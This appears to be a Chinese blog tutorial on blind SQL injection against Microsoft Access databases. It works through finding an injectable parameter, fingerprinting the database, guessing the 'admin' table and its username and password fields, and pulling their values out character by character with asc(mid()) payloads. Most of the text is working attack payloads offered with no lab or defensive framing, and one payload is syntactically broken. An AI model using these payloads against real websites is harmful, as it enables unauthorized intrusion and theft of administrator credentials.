access数据库注入

  • A+
所属分类:sql注入
摘要

access数据库注入

第一步:判断注入点,寻找注入点用‘引号报错 and1=1 正常 and 1=2 错误 说明存在sql注入

access数据库注入
access数据库注入
access数据库注入

2.判断数据库类型:

and (select count(*) from sysobjects)>0 正常是sql server 数据库

access数据库注入

and (select count(*) from msysobjects)>0 判断access 数据库 返回不够权限

access数据库注入

3.猜表名

and exists (select * from admin)

access数据库注入
access数据库注入

4猜字段

and exists (select username from admin)

access数据库注入

and exists (select password from admin)

access数据库注入

5.字段长度 , len参数提取字段长度() 判断账号密码的长度

and (select top 1 len(username)from users)>0

and (select top 1 len(password) from admin)>0

猜用户名

第一位:

and (select top 1 asc(mid(username,1,1)) from admin)>100

access数据库注入
access数据库注入

第二位:

and(select top 1 asc(username,2,1)) from admin>100

access数据库注入

7..猜密码

and (select top 1 asc(mid(password,1,1)) from admin)>100

工具验证:

access数据库注入


  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: